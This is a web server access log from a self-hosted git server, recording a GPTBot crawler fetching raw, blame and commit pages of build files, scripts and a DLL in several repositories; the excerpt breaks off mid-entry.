"https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" +[17/Feb/2026:16:17:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" [Client 74.7.227.38] [Length 12664] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" +[17/Feb/2026:16:17:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" [Client 74.7.227.38] [Length 2951] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" +[17/Feb/2026:16:17:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" [Client 74.7.227.38] [Length 14023] [Gzip 9.40] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" +[17/Feb/2026:16:17:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" [Client 74.7.227.38] [Length 11484] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/TestApp.dir" +[17/Feb/2026:16:17:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" [Client 74.7.227.38] [Length 113] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" +[17/Feb/2026:16:17:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" [Client 74.7.227.38] [Length 9949] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" +[17/Feb/2026:16:17:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" [Client 74.7.227.38] [Length 10089] [Gzip 2.91] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" +[17/Feb/2026:16:17:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c" [Client 74.7.227.38] [Length 9967] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c" +[17/Feb/2026:16:17:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/a.out?display=rendered" [Client 74.7.227.38] [Length 11056] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/a.out" +[17/Feb/2026:16:17:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c" [Client 74.7.227.38] [Length 42444] [Gzip 19.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c" +[17/Feb/2026:16:17:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c" [Client 74.7.227.38] [Length 27620] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c" +[17/Feb/2026:16:18:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/a.out" [Client 74.7.227.38] [Length 9972] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/a.out" +[17/Feb/2026:16:18:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/a.out" [Client 74.7.227.38] [Length 21627] [Gzip 28.66] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/a.out" +[17/Feb/2026:16:18:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/a.out" [Client 74.7.227.38] [Length 12648] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/a.out" +[17/Feb/2026:16:18:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" [Client 74.7.227.38] [Length 9952] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" +[17/Feb/2026:16:18:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" [Client 74.7.227.38] [Length 10518] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" +[17/Feb/2026:16:18:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" [Client 74.7.227.38] [Length 113] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" +[17/Feb/2026:16:18:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" [Client 74.7.227.38] [Length 13293] [Gzip 4.76] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/TestApp.dir" +[17/Feb/2026:16:18:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/e54b4e832455afb83987fc146872a66900dee5c0?files=C%2b%2bProject%2fTestProject%2fbuild%2fCMakeFiles%2f3.31.10%2fCompilerIdC%2fCMakeCCompilerId.c" [Client 74.7.227.38] [Length 52994] [Gzip 12.75] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c" +[17/Feb/2026:16:18:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c" [Client 74.7.227.38] [Length 33337] [Gzip 10.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c" +[17/Feb/2026:16:18:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make" [Client 74.7.227.38] [Length 15253] [Gzip 4.80] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/TestApp.dir" +[17/Feb/2026:16:18:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" [Client 74.7.227.38] [Length 194] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" +[17/Feb/2026:16:18:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresWatchdog/libwinpthread-1.dll" [Client 74.7.227.38] [Length 11055] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresWatchdog" +[17/Feb/2026:16:18:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/GoldMonitor/GoldMonitor-VeryGood2.py" [Client 74.7.227.38] [Length 882] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor-VeryGood2.py" +[17/Feb/2026:16:18:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e?files=GoldMonitor%2fgold_monitor_full.spec" [Client 74.7.227.38] [Length 25672] [Gzip 4.76] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/gold_monitor_full.spec" +[17/Feb/2026:16:18:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e?files=GoldMonitor%2fgold_monitor_full.py" [Client 74.7.227.38] [Length 34449] [Gzip 7.35] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/gold_monitor_full.py" +[17/Feb/2026:16:18:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/.vscode/launch.json?display=rendered" [Client 74.7.227.38] [Length 10879] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/.vscode/launch.json" +[17/Feb/2026:16:18:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/watchfiles?display=rendered" [Client 74.7.227.38] [Length 11018] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/watchfiles" +[17/Feb/2026:16:18:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" [Client 74.7.227.38] [Length 14026] [Gzip 9.40] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" +[17/Feb/2026:16:18:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" [Client 74.7.227.38] [Length 2951] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" +[17/Feb/2026:16:18:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c" [Client 74.7.227.38] [Length 27620] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c" +[17/Feb/2026:16:18:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make" [Client 74.7.227.38] [Length 9951] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make" +[17/Feb/2026:16:18:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c" [Client 74.7.227.38] [Length 42418] [Gzip 19.38] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c" +[17/Feb/2026:16:18:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c" [Client 74.7.227.38] [Length 9944] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c" +[17/Feb/2026:16:18:13 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/PostgresWatchdog/libwinpthread-1.dll" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresWatchdog/libwinpthread-1.dll" +[17/Feb/2026:16:18:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4843] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/PostgresWatchdog/libwinpthread-1.dll" +[17/Feb/2026:16:18:14 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/PostgresWatchdog/libwinpthread-1.dll" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresWatchdog/libwinpthread-1.dll" +[17/Feb/2026:16:18:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4843] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/PostgresWatchdog/libwinpthread-1.dll" +[17/Feb/2026:16:18:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make" [Client 74.7.227.38] [Length 14244] [Gzip 8.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make" +[17/Feb/2026:16:18:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make" [Client 74.7.227.38] [Length 4694] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make" +[17/Feb/2026:16:18:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/PostgresWatchdog/libwinpthread-1.dll" [Client 74.7.227.38] [Length 882] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresWatchdog/libwinpthread-1.dll" +[17/Feb/2026:16:18:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/PostgresWatchdog/libwinpthread-1.dll" [Client 74.7.227.38] [Length 63765] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresWatchdog/libwinpthread-1.dll" +[17/Feb/2026:16:18:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/websockets?display=rendered" [Client 74.7.227.38] [Length 11018] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/websockets" +[17/Feb/2026:16:18:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/watchfiles?display=rendered" [Client 74.7.227.38] [Length 11012] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/watchfiles" +[17/Feb/2026:16:18:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/websockets?display=rendered" [Client 74.7.227.38] [Length 11012] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/websockets" +[17/Feb/2026:16:18:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/normalizer?display=rendered" [Client 74.7.227.38] [Length 11012] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/normalizer" +[17/Feb/2026:16:18:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/normalizer?display=rendered" [Client 74.7.227.38] [Length 11017] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/normalizer" +[17/Feb/2026:16:18:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/projects?q=&sort=alphabetically&state=open" [Client 74.7.227.38] [Length 7801] [Gzip 2.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/projects" +[17/Feb/2026:16:18:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/app/fetcher.py?display=source" [Client 74.7.227.38] [Length 19422] [Gzip 5.76] [Sent-to 